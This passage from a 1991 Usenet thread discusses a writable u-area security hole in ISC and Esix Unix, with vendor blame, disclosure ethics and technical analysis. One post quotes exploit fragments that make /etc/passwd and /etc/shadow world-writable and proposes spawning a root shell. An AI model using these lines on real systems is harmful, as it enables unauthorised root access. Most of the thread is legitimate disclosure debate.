Not trying to nock on anybody in particular, but I would bet that most 
of the people that read this newsgroup would probably not have at
least one of the requirements.

Don't read me wrong.  I'm not saying that no one outthere would be
able to replicate the problem.  I am only saying that because the
code was posted EVERYONE who reads this group will be able to do it.

>Don't you think, this is enough for anyone to see, whats going on ?

Seeing what is going on and replicating it in another program is not
always a simple step.

-- 
Conor P. Cahill            (703)430-9247        Virtual Technologies, Inc.
uunet!virtech!cpcahil                           46030 Manekin Plaza, Suite 160
                                                Sterling, VA 22170 

pcg@cs.aber.ac.uk (Piercarlo Grandi) (02/17/91)

On 16 Feb 91 03:06:13 GMT, somebody said:

Anon> Sure I can.  I shelled out a _lot_ of dollars for my operating system.
Anon> I have _every_ right to expect my software to be bug-free.  Now, as a
Anon> programmer, I know this isn't reality, but in turn, this doesn't justify
Anon> it either.

READ THE WARRANTY.

Your _lot_ of dollars went towards buying a set of floppies.  If the
floppies are not defect free, they will replaced free of charge.

I am not aware of any System V vendor that sells software; they only
sell defect free floppies, and incidentally you also get the right to
use a thing called System V that may or may not be on the floppies and
about which they will not make any representation.

READ THE WARRANTY.
--
Piercarlo Grandi                   | ARPA: pcg%uk.ac.aber.cs@nsfnet-relay.ac.uk
Dept of CS, UCW Aberystwyth        | UUCP: ...!mcsun!ukc!aber-cs!pcg
Penglais, Aberystwyth SY23 3BZ, UK | INET: pcg@cs.aber.ac.uk

pcg@cs.aber.ac.uk (Piercarlo Grandi) (02/17/91)

On 15 Feb 91 12:25:34 GMT, pax@megasys.com (Garry M. Paxinos) said:

pax> In article <6027@unix386.Convergent.COM>
pax> mburg@unix386.Convergent.COM (Mike Burg) writes:

mburg> From a view of a person who has work for various Unix system
mburg> houses - you can't really blame ISC, ESIX, or any other vendors
mburg> that current has the bug in it's release.

They have been aware of the problem for probably well over a year. I
have very little doubt it is a delivberate trojan horse, for the benefit
of those "in the know". The hole was well known, nothing has been done
about it for a long time. AT&T says they corrected the bug in their
3.2.1 update tape; I thnk that all the major AT&T licensees probably
received it not much less than 2 years ago.

Now think of this: there are literally dozens (if not hundreds!) of
thousands of 386 system with this trojan horse sold and installed in
civilian and military Government offices, many installed under the
premise that C2 security was what the Government needed for better
protecting sensitive (but not classified, thank goodness) data. All
these systems will not be updated overnight; most will keep the trojan
horse for their entire useful life.

pax> I agree completely on the above, with systems as complex as a full
pax> Unix operating system it is quite likely that some things will slip
pax> thru.

This is simply unbelievable. It did not slip thru; all we have read
points out that all vendors knew it was there, and left it in by way of
a conscious decision.  All vendors except AT&T, SCO and Dell, that is.

pax> [ ... ] Unfortunately, as they seem to be able to come up with a
pax> fix by next Friday (the 22nd), the later appears to be the case...

AT&T say (informally, in this newsgroup) that they corrected it in
3.2.1, and sent the corrections in its update tape to its licensees. SCO
and and Dell installed the corrections. Probably ISC and the others have
now decided to just put those corrections in.

Incidentally, note that Dell's 3.2 product is a derivative of ISC's, yet
Dell's does not have the trojan horse and ISC has it.

ISC and many others boasts of the stringent and very expensive QA
process they run on their products, the same process that took two years
after a public fix had been posted to these screens to find the inode
bug (and some other System V vendors still haven't discovered it!).

IMNHO it is some system vendors (and ISC are bettert han most!) who are
the worst hackers; apart from engaging in mass denial of service attacks
on their customers called 'releases' :-), which usually cost much more
lost time than the Internet Worm, they put (or leave) trojan horses in
their systems, including those advertised as C2 more "secure" and sold
to the Government as such.

If you want to read something really hair raising about the potential
for vendor hackery, read Ritchie's musing on what can be done with
virusing 'cc' in his Turing award lecture in CACM.

The military have independent source verification teams and other very
expensive ways of protecting themselves against supplier hackery; we
only have the GPL :-).


Finally, it is easy to think that if the author of this incident were a
graduate student or a random chap somewhere he would by now probably
have been arrested by the Secret Service, his machines impounded, and
would be facing the probability of years in prison, and certain ruin.
Think of this, and get information about the EFF.
--
Piercarlo Grandi                   | ARPA: pcg%uk.ac.aber.cs@nsfnet-relay.ac.uk
Dept of CS, UCW Aberystwyth        | UUCP: ...!mcsun!ukc!aber-cs!pcg
Penglais, Aberystwyth SY23 3BZ, UK | INET: pcg@cs.aber.ac.uk

sef@kithrup.COM (Sean Eric Fagan) (02/17/91)

In article <1991Feb16.162814.13117@unixland.uucp> bill@unixland.uucp (Bill Heiser) writes:
>This is a good question (for those of us who don't know) -- how does
>one edit binaries in Unix?  Is there a utility like Norton out there
>(yes, I know Norton is available for ISC, but I'm running Esix).

I always use emacs for that purpose.  It's quite handy at some things...

(Or, you can use sam, if you've got it.)

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

chip@tct.uucp (Chip Salzenberg) (02/17/91)

According to mburg@unix386.Convergent.COM (Mike Burg):
>In article <27B93F44.5606@tct.uucp>, chip@tct.uucp (Chip Salzenberg) writes:
>> It is good to see that SCO's engineers, unlike those at ISC and
>> Everex, have an effective grasp on the basic principles of memory
>> protection covered in the first semester of OS design class.
>
>From a view of a person who has work for various Unix system houses -
>you can't really blame ISC, ESIX, or any other vendors that current has
>the bug in it's release.  I think the blame should be placed on AT&T.

There is plenty of blame to go around.  AT&T, ISC and Everex all
deserve big, fat rasberries.

>ON THE OTHER HAND, since you are buying a product from the vendors, you'd
>*EXPECT THEM* to sell you a stable product.

Exactly.

I don't think ISC and Everex have any right to expect empathy (not
that they're asking for it).  They took money, they delivered
*seriously* defective goods, and they didn't fix the defects until a
public outcry arose on the Usenet.  Bleh.

>Face it folks, all versions of Unix for the PC have problems of some kind.
>(Just a matter of what size the explosion will be when it goes off in your
>face.)

I don't think it's the bug that's the real problem.  It's the attitude
displayed by ISC and Everex when the bug was reported six months ago:
"Let's keep it quiet; maybe no one will find out!"  Then a Usenet
article breaks through their veil of silence, and presto! free fixes
for everyone.  Where were they six months ago?
-- 
Chip Salzenberg at Teltronics/TCT     <chip@tct.uucp>, <uunet!pdn!tct!chip>
 "I want to mention that my opinions whether real or not are MY opinions."
             -- the inevitable William "Billy" Steinmetz

sef@kithrup.COM (Sean Eric Fagan) (02/17/91)

In article <54663@bigtex.cactus.org> james@bigtex.cactus.org (James Van Artsdalen) writes:
>Key point: some reports say that the 387 emulation actually crashes in
>systems if the u block is protected.  I don't know if the source to
>the emulator is in the "source" package one receives from AT&T.
>Fixing the bug might be non-trivial if it is in the emulator, and you
>don't have source for the emulator.

Once again:  the '387 emulator runs in ring three (just as your process
does) for speed reasons.  (Take a look at the costs to go from ring three to
any lower ring sometime; it's disgusting.)  Since it runs in the same ring
as your process, it looks just like it is part of your process (i.e., if
you're using the emulator, you seem to have a multi-segment process).  Since
it needs to keep the fp registers somewhere, and they are very much
process-related, the "proper" place to keep them is in the u area, just like
other registers.  Since the emulator needs to be able to write to the
registers in the u area, your process can *also* write to the registers in
the u area.

Since the registers are in the same page as, oh, the uid, in some versions
of 3.2 (ISC and ESIX seem to be the major ones), and since writability is on
a page-level basis (not a byte-level or word-level basis), everything in
that page, including, oh, the uid, is writable.

The bug is not in the emulator, and having sources won't fix the problem.
The "bug" is in the entire way it's set up, and, to fix it, you need to
rearrange lots of things.  (Well, actually, just move some things around.)

Again, just my $0.03...

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

paul@actrix.gen.nz (Paul Gillingwater) (02/17/91)

In article <goBeX10w163w@aegis.or.jp> davidg@aegis.UUCP (Dave McLane) writes:
> As a sample of how "fast" ISC responds, I have been trying for a
> month to get them to send me a replacement for the disk that was
> supposed to update my $2149 Architech Developer to Multi-User. The
> disk got an Uncorrectable data read error, not doubt because the

Hah!  That's NOTHING!  We bought ISC 2.02, with TCP/IP and other
goodies in November 1989.  When it arrived, some of the disks that
formed part of VP/ix, TCP/IP and the Text Processing system had
unrecoverable read errors.  We shipped the disks back to the dealer,
who confirmed that they were unreadable.  Guess what -- the
Australian agent for ISC (who shall remain nameless, as they're
hopeless!) still haven't replaced them after over a year!

> New, but related subject: when ISC fires up after the login it puts
> this really grotesque series of lines about copyrights and such
> which I would like to get rid of. Anybody know if this is possible?

Yup.  I used emacs to edit the login binary, just place a null byte
at the start of the messages you wish to lose.  Works just fine.
-- 
Paul Gillingwater, paul@actrix.gen.nz

rfarris@rfengr.com (Rick Farris) (02/17/91)

In article <1991Feb15.134715.16979@virtech.uucp> cpcahil@virtech.uucp (Conor P. Cahill) writes:

| 	2. I wholeheartly DISAGREE with you posting the source code which
|	   performs the security bypass.  You could have just posted the
|	   uuencoded binary which would have been enough to prove your point
|	   without making it extremely easy for any two bit user to obtain
|	   privileged access.

|	   POSTING THE CODE WAS DEAD WRONG. 

Personally, I would never, ever, EVER run a binary that had
come across on the net. No matter what the accompanying text
said it did, and especially if I thought it might mess with
permissions.

Suppose that in addition to creating a root shell, it did
something else nasty?


--
Rick Farris  RF Engineering POB M Del Mar, CA 92014  voice (619) 259-6793
rfarris@rfengr.com     ...!ucsd!serene!rfarris      serenity bbs 259-7757

bill@unixland.uucp (Bill Heiser) (02/17/91)

In article <27BDA7B8.1DD8@tct.uucp> chip@tct.uucp (Chip Salzenberg) writes:
>
>I don't think ISC and Everex have any right to expect empathy (not
>that they're asking for it).  They took money, they delivered
>*seriously* defective goods, and they didn't fix the defects until a
>public outcry arose   [...]      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^

And they still haven't ...

-- 
home:	...!{uunet,bloom-beacon,esegue}!world!unixland!bill
	bill@unixland.uucp              The Think_Tank BBS & Public Access Unix
508-655-3848 (2400)   508-651-8723 (9600-HST)   508-651-8733 (9600-PEP-V32)
other:	heiser@world.std.com

it1@ra.MsState.Edu (Tim Tsai) (02/17/91)

In <1991Feb16.162814.13117@unixland.uucp> bill@unixland.uucp (Bill Heiser) writes:
>In article <kBTHX1w163w@aegis.or.jp> davidg@aegis.UUCP (Dave McLane) writes:
>>edit binary stuff but fortunately I'm running VPIX and am a long
>>time user of SYMDEB.EXE which worked fine.

>This is a good question (for those of us who don't know) -- how does
>one edit binaries in Unix?  Is there a utility like Norton out there
>(yes, I know Norton is available for ISC, but I'm running Esix).

  Check out fm, a curses based binary editor for Unix.  It's available
  in comp.sources.misc, volume12.

-- 
  Sometimes I think the surest sign that intelligent life exists elsewhere
  in the universe is that none of it has tried to contact us. <Calvin>

hsch@influx.sub.org (Heinrich Schnermann) (02/17/91)

lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:

>/* If you use Interactive Unix 2.2 uncomment the following line */
>/* #define ISC22 */
[15 lines of includes, ifdefs and defines follow]

What do you think about a shorter version like this?

	#include <sys/types.h>
	#include <sys/signal.h>
	#include <sys/dir.h>
	#include <sys/user.h>

Runs on Interactive 2.02 *and* 2.2.

>  chmod ("/etc/passwd",(int) 0666);
>  chmod ("/etc/shadow",(int) 0666);

Not very nice, even in Lumpi's compiled version. A little

	system("/bin/sh");

instead of chmod wouldn't change anything and would be quite more
easy to handle.

Heinrich

-- 
Heinrich Schnermann, Wichmannstr.26, 3000 Hannover 81, +49 511 835 603

src@scuzzy.in-berlin.de (Heiko Blume) (02/18/91)

src@scuzzy.in-berlin.de (Heiko Blume) writes:

>sef@kithrup.COM (Sean Eric Fagan) writes:

>>In article <1991Feb13.221259.1462@scuzzy.in-berlin.de> i made a typo:
>>>not exactly, for public access to my source archive i've set up
>>>a chroot() user that can't write anywhere, unhackable :-)
>               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

>>Sorry, that's not the case.  Once you've got root access, ....

>once you've got root access, yes, but you can get root access.
                                           ^^^
i wanted to write "CAN'T", of course...
-- 
      Heiko Blume <-+-> src@scuzzy.in-berlin.de <-+-> (+49 30) 691 88 93
                    public source archive [HST V.42bis]:
        scuzzy Any ACU,f 38400 6919520 gin:--gin: nuucp sword: nuucp
                     uucp scuzzy!/src/README /your/home

pcg@cs.aber.ac.uk (Piercarlo Grandi) (02/18/91)

On 16 Feb 91 21:48:24 GMT, sef@kithrup.COM (Sean Eric Fagan) said:

sef> Once again: the '387 emulator [ ... ] needs to keep the fp
sef> registers somewhere, and they are very much process-related, the
sef> "proper" place to keep them is in the u area, just like other
sef> registers.

In my profound naivety :-) I'd have put them at the top of the user
stack, in the user portion of the address space. The last place in the
world where I'd have put them would be in the u-area. This may need some
small difference in actions between the case where you actually have a
387 (then the kernel saves the state of the 387 in *its* data segment,
the u-area) and the case where you have an emulator (then the emulator,
that is in effect a user mode shared library, saves the state of the 387
in the user mode data segment, e.g. the stack).

sef> Since the emulator needs to be able to write to the registers in
sef> the u area, your process can *also* write to the registers in the u
sef> area. [ ... ]

sef> The bug is not in the emulator, and having sources won't fix the
sef> problem.  The "bug" is in the entire way it's set up, and, to fix
sef> it, you need to rearrange lots of things.  (Well, actually, just
sef> move some things around.)

The decision of making the u-area writable is so absurd that it cannot
be possibly have been just because of sloppiness; this seem confirmed by
the decision to keep it like this even after reports that others had
found this trapdoor that makes the Unix kernel itself into a trojan
horse.

Follow the logic: Some honest guy has found the trojan horse trapdoor
and reported it to the suppleir and then to the net: how many less
honest people have found it and kept it to themselves?

If you make a program into a trojan horse, you expect people that find
the trapdoor to collude with you and keep it secret, especially when you
tell them to hush it, as you hope that they understand that it is not in
their self interest to let everybody else know about it.
--
Piercarlo Grandi                   | ARPA: pcg%uk.ac.aber.cs@nsfnet-relay.ac.uk
Dept of CS, UCW Aberystwyth        | UUCP: ...!mcsun!ukc!aber-cs!pcg
Penglais, Aberystwyth SY23 3BZ, UK | INET: pcg@cs.aber.ac.uk

karl@ddsw1.MCS.COM (Karl Denninger) (02/18/91)

In article <1991Feb14.004122.1564@ism.isc.com> martys@ism.isc.com writes:
>The recent reports of a security hole in AT&T UNIX System V/386
>Release 3.2, and in the INTERACTIVE UNIX Operating System which
>is based upon it, are accurate.  Users with a math coprocessor
>and INTERACTIVE Version 2.2  or later of the INTERACTIVE UNIX
>Operating System should read the INTERACTIVE UNIX System Release
>Notes, page 10, first bullet item for the workaround.

Flame gun on nuclear holocost setting:
	Look, folks.  You published 2.2 while KNOWING FULL WELL that the
	problem was there.  The release notes even hint that you knew about
	it in 2.0.2 or before -- certainly before 2.2 came out.
	
	Now you've really done it.  I hope your company gets sued for gross
	negligence and you go bankrupt.  

	It is one thing to publish a product with a problem like this.  It
	is another entirely to do so with full knowledge of the hole, the
	damage it will cause when exploited, and simply not care.  That is,
	generally, the definition of gross negligence.  It is akin to
	selling a person a car with known defective brakes.

	There is lots of evidence of this "I don't care" attitude -- the
	fact that the bug was reported to you more than 6 months ago and
	ignored, and the published description of a "fix" in the release
	notes for 2.2.  Of course what's not in the 2.2 release notes is
	that if you apply the fix, and don't have a math chip, the system
	will then not be able to do any floating point math!

>For all other users, INTERACTIVE Systems Corp. will provide a
>comprehensive fix to the problem.  It will be provided as an
>update (bug-fix) diskette to users of 386/ix Version 2.0.2,
>INTERACTIVE UNIX Version 2.2.1, and the C2 Security Extension.
>For Version 2.2 users without a math coprocessor, call into
>Warranty support, (213) 453-8649 and ask for the free upgrade
>to Version 2.2.1 as well as the 2.2.1 security-hole bug-fix
>diskette.  As with all INTERACTIVE bug-fix diskettes, it will be
>available free of charge through the Support department.

Post the fix.  If you have any integrity at all.

>The anticipated availability date of the bug-fix is February 22nd.
>
>Marty C. Stewart
>Support Team Leader
>Interactive Systems Corp.

You and your entire crew deserve to be fired.  ISC has deliberately done
this.  The "support team" appears to have deliberately ignored the report 
of this bug for at least 6 months.  It is a >fact< that the problem was
known when 2.2 was released.

Perhaps Kodak will take this seriously enough to enforce some real 
discipline from the top level down -- and replace all of you.

(flame gun off)

--
Karl Denninger (karl@ddsw1.MCS.COM, <well-connected>!ddsw1!karl)
Public Access Data Line: [+1 708 808-7300], Voice: [+1 708 808-7200]
Macro Computer Solutions, Inc.   "Quality Solutions at a Fair Price"

davidsen@sixhub.UUCP (Wm E. Davidsen Jr) (02/18/91)

In article <483@stephsf.stephsf.com> wengland@stephsf.stephsf.com (Bill England) writes:
| 
|    The program crashes with a memory falt on SCO ODT 1.0 on a system
|    with an fpu.

  As the original posting said, the bug is in the emulator.

|    I have serious reservations about this kind of post.  While as an
|    system administrator system I want to know, at the same time it
|    is similar to giving handguns to a bunch of street thugs.

  It's more like telling the citizens that the thugs have handguns.
Secrecy doesn't solve anything, and the poster has apparently tried to
interest the vendors in fixing it without success.

  The crackers pick up on stuff like this and share it, and the vendors
don't want to admit they have a problem, so they stonewall.

  I hope the poster also sent it to Spenser Katt (_PC Week_) and Robert
X Cringely (_Info World_) for their gossip columns. They thrive on
coverups.
-- 
bill davidsen - davidsen@sixhub.uucp (uunet!crdgw1!sixhub!davidsen)
    sysop *IX BBS and Public Access UNIX
    moderator of comp.binaries.ibm.pc and 80386 mailing list
"Stupidity, like virtue, is its own reward" -me

davidsen@sixhub.UUCP (Wm E. Davidsen Jr) (02/18/91)

In article <27B93F44.5606@tct.uucp> chip@tct.uucp (Chip Salzenberg) writes:

| Forgive me if I react, not by congratulating SCO, but by dropping my
| jaw in mind-boggled astonishment that such a huge, gaping, obvious,
| you-can-drive-a-truck-through-it security hole was ever released by
| ISC or Everex in a beta, much less sold to customers in version after
| version after version.

  I am amazed that the companies didn't fix it instantly and send it by
registered express mail to every owner. In today's litigatious climate,
I can see a jury finding them negligent. And that goes for every other
vendor, although AT&T has an obligation to get the info out to the
source licensees as well, I would think.
-- 
bill davidsen - davidsen@sixhub.uucp (uunet!crdgw1!sixhub!davidsen)
    sysop *IX BBS and Public Access UNIX
    moderator of comp.binaries.ibm.pc and 80386 mailing list
"Stupidity, like virtue, is its own reward" -me

davidsen@sixhub.UUCP (Wm E. Davidsen Jr) (02/18/91)

In article <329@alderan.uucp> chris@alderan.uucp (Christoph Splittgerber) writes:

| Oh my god - its really true. (on my ISC 2.0.2 *with* co-proc.)

  Here's a though for you, since the bug is in the emulator, and you
have a coprocessor, could it be that the system isn't seeing the coproc,
and that when you find out why, not only will the bug go away, but the
system should be a tad faster, too.
-- 
bill davidsen - davidsen@sixhub.uucp (uunet!crdgw1!sixhub!davidsen)
    sysop *IX BBS and Public Access UNIX
    moderator of comp.binaries.ibm.pc and 80386 mailing list
"Stupidity, like virtue, is its own reward" -me

davidsen@sixhub.UUCP (Wm E. Davidsen Jr) (02/18/91)

In article <11450@uhccux.uhcc.Hawaii.Edu> bekesy@uhccux.uhcc.Hawaii.Edu (Bekesey Lab) writes:

| >Get SCO.  [...]
| 
| Please keep your mindless SCO chauvinism to yourself.

  Since the choice is to either get a coprocessor or a more responsive
vendor, I don't think the it was mindless, nor particularly
chauvanistic. If you were as quick to give SCO credit as blame, then you
would be less offended by this.
-- 
bill davidsen - davidsen@sixhub.uucp (uunet!crdgw1!sixhub!davidsen)
    sysop *IX BBS and Public Access UNIX
    moderator of comp.binaries.ibm.pc and 80386 mailing list
"Stupidity, like virtue, is its own reward" -me

sef@sco.com (Sean Eric Fagan) (02/18/91)

In article <PCG.91Feb16210231@teachk.cs.aber.ac.uk> pcg@cs.aber.ac.uk (Piercarlo Grandi) writes:
>AT&T say (informally, in this newsgroup) that they corrected it in
>3.2.1, and sent the corrections in its update tape to its licensees. SCO
>and and Dell installed the corrections. Probably ISC and the others have
>now decided to just put those corrections in.

(Relating to a previous message thread, the observant will undoubtedly
notice that the From: line says 'sef@sco.com'; this is posted as an SCO
employee, as it might be read as a plug.  It's not, not really, but, well,
you get the idea. 8-))

I don't know about Dell, but SCO fixed this, on our own, before AT&T sent
out 3.2.1.  Anyone who was a beta-site for SCO's 3.2.0 had a kernel that did
not have this "feature"; I'm too fuzzy about the dates to be more precise
than that (for example, it's quite probably that we actually shipped 3.2.0
[non beta, that is] before AT&T sent out 3.2.1, but I'm not sure about
that).

Given the technical expertise people have attributed to those at Dell, I
would not be surprised if they did the same thing.  However, I have
absolutely no experience with them or their product, so it's only
conjecture.

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

davidsen@sixhub.UUCP (Wm E. Davidsen Jr) (02/18/91)

In article <1991Feb15.134715.16979@virtech.uucp> cpcahil@virtech.uucp (Conor P. Cahill) writes:

| 	2. I wholeheartly DISAGREE with you posting the source code which
| 	   performs the security bypass.  You could have just posted the
| 	   uuencoded binary which would have been enough to prove your point
| 	   without making it extremely easy for any two bit user to obtain
| 	   privileged access.  

  How is the uuencoded binary less dangerous than the source? Once you
can write the passwd and shadow files you can either make your login
root, change the root passwd, create a new root userid, etc.

  I don't see in this case what would have been gained by giving the
hacker a way to do it and not telling him how.
-- 
bill davidsen - davidsen@sixhub.uucp (uunet!crdgw1!sixhub!davidsen)
    sysop *IX BBS and Public Access UNIX
    moderator of comp.binaries.ibm.pc and 80386 mailing list
"Stupidity, like virtue, is its own reward" -me

sef@kithrup.COM (Sean Eric Fagan) (02/18/91)

In article <3215@sixhub.UUCP> davidsen@sixhub.UUCP (bill davidsen) writes:
>  Here's a though for you, since the bug is in the emulator, and you
>have a coprocessor, could it be that the system isn't seeing the coproc,
>and that when you find out why, not only will the bug go away, but the
>system should be a tad faster, too.

Bill, the bug is *not* in the emulator.  It's in the way the entire system
(kernel and emulator) were designed.  I posted a longish article going into
this in a bit of detail.

The upshot is that no ISC system before 2.2 can be configured to "fix" it,
and no ISC 2.2 system can be configured to fix it if the machine does not
have an FPU (note that 486s have an FPU, so they're "safe," after being
configured properly).

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

pax@megasys.com (Garry M. Paxinos) (02/18/91)

In article <1991Feb18.004416.12447@ddsw1.MCS.COM> karl@ddsw1.MCS.COM (Karl Denninger) writes:
   Flame gun on nuclear holocost setting:
	   Look, folks.  You published 2.2 while KNOWING FULL WELL that the
	   problem was there.  The release notes even hint that you knew about
	   it in 2.0.2 or before -- certainly before 2.2 came out.

And obviously they knew about it when the 2.2.1 update came out...

	   Now you've really done it.  I hope your company gets sued for gross
	   negligence and you go bankrupt.  

I am absolutely positive it (legal action) is being looked into...

	   It is one thing to publish a product with a problem like this.  It
	   is another entirely to do so with full knowledge of the hole, the
	   damage it will cause when exploited, and simply not care.  That is,
	   generally, the definition of gross negligence.  It is akin to
	   selling a person a car with known defective brakes.

Agreed.  

	   There is lots of evidence of this "I don't care" attitude -- the
	   fact that the bug was reported to you more than 6 months ago and
	   ignored, and the published description of a "fix" in the release
	   notes for 2.2.  Of course what's not in the 2.2 release notes is
	   that if you apply the fix, and don't have a math chip, the system
	   will then not be able to do any floating point math!

Not to beat a dead horse, but the fact that 2.2.1 did not address the 
'feature' proves the above sentiment beyond all shadow of a doubt.  

[...]

   >The anticipated availability date of the bug-fix is February 22nd.
   >
   >Marty C. Stewart
   >Support Team Leader
   >Interactive Systems Corp.

   You and your entire crew deserve to be fired.  ISC has deliberately done
   this.  The "support team" appears to have deliberately ignored the report 
   of this bug for at least 6 months.  It is a >fact< that the problem was
   known when 2.2 was released.

And in 2.2.1, there simply is NO excuse.  Zero, None, NADA!  Get my drift..

Let's look at this, 2.2 came out around May 90 (right?),  2.2.1 came out in
early Dec 90, it's now mid Feb 91 ...  hmmm.. almost a year... and still
no fix...  When did ISC get AT&T's 3.2.1 which apparently included the
fix?   

   Perhaps Kodak will take this seriously enough to enforce some real 
   discipline from the top level down -- and replace all of you.

I certainly hope so...

   (flame gun off)

Ahh, in this case, leave the flame thrower on...  they deserve it!

pax
--
E-Mail:pax@megasys.com    pax@ankh.ftl.fl.us    gmp@pinet.aip.org
USNail:Megasystems, Inc.    2055 South Congress Ave,  Delray Beach,  FL  33445
UUCP  :{gatech!uflorida!novavax!ankh,   mthvax,  shark,   attmail}!megasys!pax
Voice :407-243-2405   Data: 407-243-2407  Fax: 407-243-2408   Telex: 156281499
          "This is America, Right?!?!?"  member of 2 Live Crew

pax@megasys.com (Garry M. Paxinos) (02/18/91)

In article <PCG.91Feb16210231@teachk.cs.aber.ac.uk> pcg@cs.aber.ac.uk (Piercarlo Grandi) writes:

   On 15 Feb 91 12:25:34 GMT, pax@megasys.com (Garry M. Paxinos) said:

   pax> In article <6027@unix386.Convergent.COM>
   pax> mburg@unix386.Convergent.COM (Mike Burg) writes:

   mburg> From a view of a person who has work for various Unix system
   mburg> houses - you can't really blame ISC, ESIX, or any other vendors
   mburg> that current has the bug in it's release.

[...]

   Now think of this: there are literally dozens (if not hundreds!) of
   thousands of 386 system with this trojan horse sold and installed in
   civilian and military Government offices, many installed under the
   premise that C2 security was what the Government needed for better
   protecting sensitive (but not classified, thank goodness) data. All
   these systems will not be updated overnight; most will keep the trojan
   horse for their entire useful life.

Not to mention the systems at Nuclear Power Plants running critical 
monitoring functions.  One thing, I can assure you the 'trojan horse' will
not remain in the systems that my company has installed.

   pax> I agree completely on the above, with systems as complex as a full
   pax> Unix operating system it is quite likely that some things will slip
   pax> thru.

   This is simply unbelievable. It did not slip thru; all we have read
   points out that all vendors knew it was there, and left it in by way of
   a conscious decision.  All vendors except AT&T, SCO and Dell, that is.

Just to make sure we are on the same wavelength, I was merely saying I 
can understand that some things will slip thru.  However, I was definetly
not refering to the security bug.  

There is simply no excuse to not fix a problem like this as soon as you know 
about it. And this isn't even a case of something slipping thru the cracks
as it is documented in their release notes.  And they still didn't fix
it when an update came out SEVEN months later!

   pax> [ ... ] Unfortunately, as they seem to be able to come up with a
   pax> fix by next Friday (the 22nd), the later appears to be the case...

   AT&T say (informally, in this newsgroup) that they corrected it in
   3.2.1, and sent the corrections in its update tape to its licensees. SCO
   and and Dell installed the corrections. Probably ISC and the others have
   now decided to just put those corrections in.

I really have to wonder what their motivation was to wait this long...
Did they really want to put themselves in to a litigaous (sp?) situation?

   Incidentally, note that Dell's 3.2 product is a derivative of ISC's, yet
   Dell's does not have the trojan horse and ISC has it.

   ISC and many others boasts of the stringent and very expensive QA
   process they run on their products, the same process that took two years
   after a public fix had been posted to these screens to find the inode
   bug (and some other System V vendors still haven't discovered it!).

The inode bug is simply amazing as fixes have been posted here..  But then
again, ISC received corrected code from AT&T and didn't put that in either..

   IMNHO it is some system vendors (and ISC are bettert han most!) who are
   the worst hackers; apart from engaging in mass denial of service attacks
   on their customers called 'releases' :-), which usually cost much more
   lost time than the Internet Worm, they put (or leave) trojan horses in
   their systems, including those advertised as C2 more "secure" and sold
   to the Government as such.

   If you want to read something really hair raising about the potential
   for vendor hackery, read Ritchie's musing on what can be done with
   virusing 'cc' in his Turing award lecture in CACM.

Offhand, do you know which issue?

   The military have independent source verification teams and other very
   expensive ways of protecting themselves against supplier hackery; we
   only have the GPL :-).

   Finally, it is easy to think that if the author of this incident were a
   graduate student or a random chap somewhere he would by now probably
   have been arrested by the Secret Service, his machines impounded, and
   would be facing the probability of years in prison, and certain ruin.
   Think of this, and get information about the EFF.

It would be poetic justice for ISC to have their machines impounded... <sigh>

pax
--
E-Mail:pax@megasys.com    pax@ankh.ftl.fl.us    gmp@pinet.aip.org
USNail:Megasystems, Inc.    2055 South Congress Ave,  Delray Beach,  FL  33445
UUCP  :{gatech!uflorida!novavax!ankh,   mthvax,  shark,   attmail}!megasys!pax
Voice :407-243-2405   Data: 407-243-2407  Fax: 407-243-2408   Telex: 156281499
          "This is America, Right?!?!?"  member of 2 Live Crew

cpcahil@virtech.uucp (Conor P. Cahill) (02/18/91)

jdeitch@jadpc.cts.com (Jim Deitch) writes:
>One quick question though,
>  I tried to fix the problem temporarily by setting UAREARW to 0 as
>was posted.  I rebult the kernel and all was well, until cnews tried
>to run.  I got a core dump from sendbatches.  Also the dfspace utility

This is because when you set UAREAW to 0 the floating point emulator won't 
work.  If you don't have a floating poing co-processor, any floating point
operations will cause a core dump.

-- 
Conor P. Cahill            (703)430-9247        Virtual Technologies, Inc.
uunet!virtech!cpcahil                           46030 Manekin Plaza, Suite 160
                                                Sterling, VA 22170 

cpcahil@virtech.uucp (Conor P. Cahill) (02/18/91)

davidsen@sixhub.UUCP (Wm E. Davidsen Jr) writes:
>  How is the uuencoded binary less dangerous than the source? Once you
>can write the passwd and shadow files you can either make your login
>root, change the root passwd, create a new root userid, etc.

THE uunencoded binary is not less dangerous.  I meant "a uuencoded binary
that proves that root access was obtained without damaging the security
of the system".

-- 
Conor P. Cahill            (703)430-9247        Virtual Technologies, Inc.
uunet!virtech!cpcahil                           46030 Manekin Plaza, Suite 160
                                                Sterling, VA 22170 

davidsen@sixhub.UUCP (Wm E. Davidsen Jr) (02/18/91)

In article <1991Feb18.042427.9434@kithrup.COM> sef@kithrup.COM (Sean Eric Fagan) writes:

| Bill, the bug is *not* in the emulator.  It's in the way the entire system
| (kernel and emulator) were designed.  I posted a longish article going into
| this in a bit of detail.

  My understanding is that the emulator is keeping the fake registers
in the user area, and mapping that into addressable user space. By
mapping the fake registers elsewhere, such as the suggestion of high
stack, the user area would not be in the user process address space.
There's no good reason to store the emulated registers in the user area,
just because that's where they go for the hardware registers.

  Other system services map small sieces of memory, such as shared
memory allocation. There's no justification for having the user area
mapped when all that's needed is a section of memory large enough to
hold the emulated FPU stack and registers. The saved pseudo registers
could be in a separate segment, but I don't see any requirement to get
then out of user default space, it's just an implementation detail.

  I willing to be shown that the error lies elsewhere, but that sounds
like a pure error in the emulation to me. The fix may require a new
emulator which uses another part of memory, but the need for and major
kernel changes is not intuitively obvious (to me). The code to attach
the emulator is presumably there already, and the code to map the uaer
block can just be flat out disabled.

  Again, I may be missing something, but the solution seems pretty
